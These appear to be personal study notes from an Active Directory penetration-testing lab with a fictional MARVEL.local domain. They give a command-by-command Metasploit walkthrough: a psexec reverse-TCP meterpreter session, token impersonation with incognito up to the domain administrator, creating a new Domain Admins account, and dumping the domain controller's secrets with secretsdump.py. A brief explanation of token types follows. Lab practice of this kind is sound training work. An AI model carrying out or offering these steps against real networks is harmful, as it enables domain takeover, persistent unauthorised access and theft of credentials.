Use Incognito on Metasploit:
Getting Meterpreter session:
msfconsole
search psexec
use windows/smb/psexec (exploit)
set payload windows/x64/meterpreter/reverse_tcp
set rhosts 192.168.218.139 #Victim PC, this is ThePunisher
set smbuser fcastle
set smbpass Password1
set smbdomain MARVEL.local
options #to confirm everything is set
run
Meterpreter steps:
Confirm target (kinda redundant):
shell
whoami
ctrl + cattack/incognito:
load incognito
list_tokens -u-u for user
-g for group
impersonate_token marvel\\fcastle #2 \\ for character escapingCheck:
shell
whoami
ctrl + cgo back to before:
rev2self
getuidImpersonate ADMIN if you have their token:
list_tokens -u
impersonate_token marvel\\administratorCreate user for us:
shell
net user /add hawkeye Password1@ /domain
Make them admin:
net group "Domain Admins" hawkeye /ADD /DOMAIN
Test/What next?
Try to secrets dump the domain controller (which we can’t do with any of the accounts we had (fcastle and SQLService acc that we cracked)
secretsdump.py MARVEL.local/hawkeye:'Password1@'@192.168.218.136 #IP is domain controller
Attack Explained:
Temporary keys that allow you to access a system/network without having to provide credentials each time you access a file. Like cookies!
Two types:
- Delegate: created for logging into a machine or using Remote Desktop (RDP)
- Impersonate: “non-interactive” such as attaching a network drive or a domain logon script (like our mapped drive on spiderman)
Pop a shell and load incognito:
VS finding a domain admin token:
